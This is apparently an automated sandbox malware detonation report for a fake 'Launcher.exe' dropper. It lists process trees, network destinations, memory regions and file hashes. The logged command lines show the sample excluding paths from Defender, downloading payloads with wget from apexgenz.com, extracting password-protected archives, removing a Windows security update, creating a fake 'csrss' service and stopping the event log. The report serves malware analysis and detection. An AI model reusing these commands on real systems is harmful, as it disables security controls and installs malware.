| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
"C:\Users\Admin\AppData\Roaming\services\plugin0228"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4060 -ip 4060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 592
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3088 -ip 3088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 212
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| NL | 194.87.31.18:3333 | tcp | |
| US | 8.8.8.8:53 | 18.31.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
memory/1132-20-0x0000000002790000-0x00000000027C6000-memory.dmp
memory/1132-21-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/1132-23-0x0000000005300000-0x0000000005928000-memory.dmp
memory/1132-24-0x0000000000E10000-0x0000000000E20000-memory.dmp
memory/1132-22-0x0000000000E10000-0x0000000000E20000-memory.dmp
memory/1132-25-0x0000000005960000-0x0000000005982000-memory.dmp
memory/1132-26-0x0000000005A00000-0x0000000005A66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phlul210.5ol.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1132-29-0x0000000005A70000-0x0000000005AD6000-memory.dmp
memory/1132-37-0x0000000005C60000-0x0000000005FB4000-memory.dmp
memory/1132-38-0x00000000060B0000-0x00000000060CE000-memory.dmp
memory/1132-39-0x00000000060F0000-0x000000000613C000-memory.dmp
memory/1132-40-0x0000000007060000-0x00000000070F6000-memory.dmp
memory/1132-41-0x00000000065E0000-0x00000000065FA000-memory.dmp
memory/1132-42-0x0000000006630000-0x0000000006652000-memory.dmp
memory/1132-43-0x0000000007920000-0x0000000007EC4000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
memory/2132-48-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/2132-49-0x0000000004A90000-0x0000000004AA0000-memory.dmp
memory/2132-50-0x0000000004A90000-0x0000000004AA0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/2132-62-0x000000007FAE0000-0x000000007FAF0000-memory.dmp
memory/2132-63-0x0000000006EC0000-0x0000000006EF2000-memory.dmp
memory/2132-75-0x0000000006260000-0x000000000627E000-memory.dmp
memory/2132-72-0x0000000004A90000-0x0000000004AA0000-memory.dmp
memory/2132-64-0x0000000070450000-0x000000007049C000-memory.dmp
memory/2132-76-0x0000000006F00000-0x0000000006FA3000-memory.dmp
memory/2132-77-0x0000000007650000-0x0000000007CCA000-memory.dmp
memory/2132-78-0x0000000007080000-0x000000000708A000-memory.dmp
memory/2132-79-0x0000000007210000-0x0000000007221000-memory.dmp
memory/2132-80-0x0000000007240000-0x000000000724E000-memory.dmp
memory/2132-81-0x0000000007250000-0x0000000007264000-memory.dmp
memory/2132-82-0x0000000007290000-0x00000000072AA000-memory.dmp
memory/2132-83-0x0000000007280000-0x0000000007288000-memory.dmp
memory/2132-86-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/3904-89-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f56160e4363a71aa0035ccc193520d5a |
| SHA1 | 5d07645991be5c5fec7a7ec6a4f5e24dee75120d |
| SHA256 | 6cf3da0e8a653c6dd58d62b6a6f9b88ee3d02787c3c069c06ded4920da8b9557 |
| SHA512 | 5437517af0b620efb8f37039220358e8c2c5e95dbbe277a0d8af0076b937ed092a6e2b02a2fd1bb531c4c5e3946ed2ad44130d34a6cd02213b5a576c71d1b4cc |
C:\Users\Admin\AppData\Roaming\services\WinRAR.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
| MD5 | 907c1e4e19a50fff3ac19087ebe04295 |
| SHA1 | 699187f7bfb7e65d05d445b46f9583c77f519c0e |
| SHA256 | 115c37d38945ee56b0e7a23cf90c60f63191aaf312c207c8ac5ab719a1500158 |
| SHA512 | 5da0d6b688c09d926881512f698ec8d205c08c37eb51f2a18471aa3f99aeb7a771030c170ea933cc67f17852a433359ce9c51fcfcff780cb6d35d78d0eb5e9c7 |
memory/1132-94-0x0000000073B10000-0x00000000742C0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\plugin0228
| MD5 | 626fb04cdd464c32c07e7a9610f7fb11 |
| SHA1 | cf6d3a911e2b915b52f00777a6bc984f2a26f61a |
| SHA256 | 3d1c1ba663250f344a2a2bc64c294755ec2367d03540cd851485c47a1b858c09 |
| SHA512 | 7fcfb2971e2ccc837af3325cbffa4560afe04d43491ce08524f25659ae78d798c4996764ed1ca56152b7fc65ade16f0e064a6d2a6ffb1f7d818bcc44e761f338 |
memory/4400-100-0x0000000000A10000-0x0000000000AA2000-memory.dmp
memory/1132-101-0x0000000000E10000-0x0000000000E20000-memory.dmp
memory/4400-104-0x0000000005370000-0x0000000005380000-memory.dmp
memory/4400-103-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/4060-105-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4400-109-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/4060-110-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4060-108-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4060-112-0x0000000000400000-0x000000000046E000-memory.dmp
memory/1552-116-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | a169e71afd4e5f47e47f43b4ac3f8107 |
| SHA1 | 206e3f4d800d0c9c3817a41fc6633d530c81f531 |
| SHA256 | 741f9b9daa581ec8f7826cbab7e7f153744c827c0e20509bd01499cba6ea59ec |
| SHA512 | 2b69293e72ac004f2fb28f973a2333aa9318bc6a5ee39ef375690bcb39058273e6c467f6e429582573e4ff6109c7d7b9a8b5df78b433d471a6319ad5587b6cba |
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
| MD5 | 82a56a666981e9e163a1aba74dc70aa8 |
| SHA1 | 709e44e71ff38d0771d839b74f270c23daa42f64 |
| SHA256 | c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6 |
| SHA512 | ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5a5a545484abcfd739e596c1ff8753d5 |
| SHA1 | 42543fdc4b7620ba21ba5d27fd4ab45a549eb503 |
| SHA256 | 872b4526efdb11051475cfde82c187adfa80a2496ed9835550c1421a039a203e |
| SHA512 | 7a1516dab7c58455fe687cec52c522aa111d0b454d8c7c390417e134a2e1631a9bd68c71f82c92423dce598244c71c67e7576121e7ea4c931421a3458f798374 |
memory/2980-125-0x00007FF750420000-0x00007FF750DB5000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | 07c3acb50e523e72a406b9819e1a57e8 |
| SHA1 | 9762c1432bc70c53f413c3e84b61132f91e03687 |
| SHA256 | 4dde8e0902986a61f0b2c463e101d8a7dedac2b46f73d0775aa68d7abd799ddc |
| SHA512 | c52963206e297b7ecea2ae72bc9ba8e96b6ba05f4f87a77257c473c653946ba10f8acb801462b51694c7ea6713701b519cc724745211a5afa3efe4909157c8c0 |
memory/2272-128-0x0000020FAFF40000-0x0000020FAFF62000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c5a528e069e8bc10a7e79d9ca0b91e5 |
| SHA1 | c5d6f360660ead536052a42bb067e71cf2ada044 |
| SHA256 | c84fcb5e1e3e1a831a8a70a0328ae75b2acfbea711bf955f55d78aac2b70beba |
| SHA512 | c5c84fb452c56fe5f71846a1638b5ce0463dbea3db30d64b6669b0079cab6ba730e487fa0fd1579cf363b22efe25e0e927a6b8108309119cd1aed8dc6784c6bf |
memory/2272-139-0x00007FFCA5970000-0x00007FFCA6431000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
memory/2272-140-0x0000020F95A70000-0x0000020F95A80000-memory.dmp
memory/2272-142-0x0000020F95A70000-0x0000020F95A80000-memory.dmp
memory/2272-153-0x00007FF499A90000-0x00007FF499AA0000-memory.dmp
memory/2272-152-0x0000020FB00D0000-0x0000020FB00EC000-memory.dmp
memory/2272-154-0x0000020FB00F0000-0x0000020FB00FA000-memory.dmp
memory/2272-155-0x0000020FB0100000-0x0000020FB0108000-memory.dmp
memory/2272-156-0x0000020FB0110000-0x0000020FB011A000-memory.dmp
memory/2272-159-0x00007FFCA5970000-0x00007FFCA6431000-memory.dmp
memory/2980-162-0x00007FF750420000-0x00007FF750DB5000-memory.dmp
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | 4d28b7f4377610db517b9d6c59447370 |
| SHA1 | 7b53f04dbc50f1647b6d70ff9ec19464076de81e |
| SHA256 | c04bd038f80c5437c763a007632434f0f977236f76ef35be21a1976736de5f91 |
| SHA512 | 3c272cf865a92a30289d65c2ab811714ad338ef235033dc3b5ded6ca96d1356639f2bf1bc32847930e10775c099e2f11c2a7d112cc3a26b6df41f376e49ce0e9 |
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | 42d6eab5be3e37ba76559e723c182b02 |
| SHA1 | b618be9077e666beaf8429b0c16ec99556e93945 |
| SHA256 | 2cf6c293078bc06a0ac0cb4b003463d3ff85f7eed7b38d0d04557d08fd4c0e73 |
| SHA512 | 15e963e921f393335787359ed3053494d7d6bd0534408cc55dd536cab6e6a8072dee110623d3f790139095b7f2bcf16a99dd9900cd2258ea798883ffb2236d95 |
memory/3692-165-0x00007FF6F9240000-0x00007FF6F9BD5000-memory.dmp
memory/2652-166-0x00007FFCA5970000-0x00007FFCA6431000-memory.dmp
memory/2652-168-0x0000019B6BEB0000-0x0000019B6BEC0000-memory.dmp
memory/2652-167-0x0000019B6BEB0000-0x0000019B6BEC0000-memory.dmp
memory/2652-188-0x0000019B6E250000-0x0000019B6E26C000-memory.dmp
memory/2652-189-0x0000019B6BEB0000-0x0000019B6BEC0000-memory.dmp
memory/2652-183-0x00007FF4DED90000-0x00007FF4DEDA0000-memory.dmp
memory/2652-190-0x0000019B6E270000-0x0000019B6E325000-memory.dmp
memory/2652-191-0x0000019B6E330000-0x0000019B6E33A000-memory.dmp
memory/4328-194-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/2652-195-0x0000019B6E4E0000-0x0000019B6E4FA000-memory.dmp
memory/2652-196-0x0000019B6E4C0000-0x0000019B6E4C6000-memory.dmp
memory/2652-197-0x0000019B6BEB0000-0x0000019B6BEC0000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\03plugins0228.rar
| MD5 | f6b3be773cccae14c5cd847cd985ebe6 |
| SHA1 | 58aca57e4b8fb20b72a0843a9729c2c83bcc734d |
| SHA256 | b8cef9fd1ae3e31b6bdfcb55a05dff29db4e0fb452c65808067fdca70339a310 |
| SHA512 | e197e26abf8ba72d17ed83f81aedbc12b61b14c51410a7eafe9f608551f75157b592d39bfe093548ae82088d3f4dfd56571ede1d23596b6116e24869af9b5a45 |
memory/2652-201-0x00007FFCA5970000-0x00007FFCA6431000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | a4c063b0dcc296275528b8380bac8957 |
| SHA1 | 8b874d826a3894ab1f85a22583d083ee9b9773f3 |
| SHA256 | d723ea40bf7166c410e71577df4bb5d19180791a21ae226c805b9d148f0abcac |
| SHA512 | 2e14bed997b70a22e3cb68c8aabcbbde717f08e327fcbcb6c7b82018d40af589672a9365e4173a744a60213248291230bba2bf4d8f0a2ba83e0e31bc3d7a716a |
memory/1372-206-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1372-205-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1372-207-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1372-209-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1372-208-0x0000000140000000-0x000000014000D000-memory.dmp
memory/1372-212-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4912-213-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-214-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-215-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-216-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/3692-218-0x00007FF6F9240000-0x00007FF6F9BD5000-memory.dmp
memory/4912-220-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-221-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-222-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-223-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-224-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-226-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-225-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-227-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-228-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-230-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-231-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-232-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-229-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-233-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-234-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-235-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-237-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-236-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-239-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-238-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-240-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-241-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-242-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-243-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-244-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-246-0x00007FFCC4990000-0x00007FFCC4B85000-memory.dmp
memory/4912-245-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-247-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-248-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-249-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-250-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-251-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-252-0x000001929C750000-0x000001929C770000-memory.dmp
memory/4912-253-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-254-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-255-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-256-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-257-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-258-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-261-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4912-262-0x00000192ACD30000-0x00000192ACD50000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | 844a0a040fe8d6f78db6546925085490 |
| SHA1 | 637a390be71af50906251a05a638769b262f1683 |
| SHA256 | a2704f04342a163925809668a64aaa22a17f54c2ca6be83d7abf7020570f3670 |
| SHA512 | 3aaeb73714e8fc4d0d21554a3c9b2d11daafb0990c3cabfc466b0292857698f932ece637b68b20227ed335e67c6a9582a9fad0425c2af4a3a8b2484bc4847ff3 |
C:\Users\Admin\AppData\Roaming\services\3plugin0228
| MD5 | de86cd08dad35aa60d10f02951773e48 |
| SHA1 | 287ab750c5eebf915897825f3657baa2f49ff02f |
| SHA256 | 31ae7d6a38ade26895d7924897333fe45a24a5f11ca11ae9ba9cdb957915ec80 |
| SHA512 | bd43cf96de4794149eeda5cf66c08e2c925e5f7cbee68cdb70a68e40d170c166b1866240609c111a4c5a9e95daef0b09cd78988de6ff4fe3a1cfa64724a0c50c |
memory/3088-270-0x0000000000430000-0x0000000000479000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\WGET-H~1
| MD5 | 3b736d80de41d60a32029de5c109a3e3 |
| SHA1 | b48c4145e80b52cfb5383b68adaf3deba1e13c83 |
| SHA256 | c449ee37cddb63d846d30d960dcb524888f24843ef4e1141afe9a7bc3a714112 |
| SHA512 | 87dbf306e6f8861a6527338fb5a982ccdec7f145273c2228b028c5dcdabc1f6c07ec0090a234174e30083b2727e9c983acbc3e529ddba85227419e40304a494d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 292fcc12aca8cf9f20c63b10c892e4c8 |
| SHA1 | f10d4d7f8b6bb3a2e4b5f25c14c2ee5a8572b2d7 |
| SHA256 | 3ba8bb86cff5be6a1e45a8f6eb450465efc5d3563fc67d53e91c4c1f50c6983f |
| SHA512 | cc8728a0f9eacd9f0a38bb7774098b4e5a71c1b81df8d207d3aa485d03d963caf0e1bbc82dcfb5e70b86dfda6b92d5f0199320905570720c66e6b8be9141f1bd |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:54
Platform
win7-20240221-en
Max time kernel
1791s
Max time network
1820s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:55
Platform
win10v2004-20240226-en
Max time kernel
1788s
Max time network
1176s
Command Line
Signatures
Processes
